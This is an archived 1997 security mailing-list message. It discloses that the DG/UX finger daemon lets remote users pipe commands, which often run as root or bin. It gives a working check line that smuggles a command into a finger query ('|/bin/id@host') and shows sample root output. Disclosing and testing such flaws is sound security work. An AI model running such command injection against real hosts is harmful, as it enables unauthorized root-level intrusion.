dgux in.fingerd vulnerability

George Imburgia (gti@HOPI.DTCC.EDU)
Mon, 11 Aug 1997 12:32:38 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Scott Moseman: "Re: solaris ^[[1J reboot"
Previous message: Alex: "procfs patch (fwd)"

Another old bug that won't die.

The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

finger /W@host

If it returns something like this, it may be vulnerable;

To see the uid in.fingerd is running as, try this;

finger "|/bin/id@host"

Often, you will see something like this;

uid=0(root) gid=0(root)

or;

uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia =
= Network Specialist, Computer Services =
= Office of the President =
= Delaware Tech =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Next message: Scott Moseman: "Re: solaris ^[[1J reboot"
Previous message: Alex: "procfs patch (fwd)"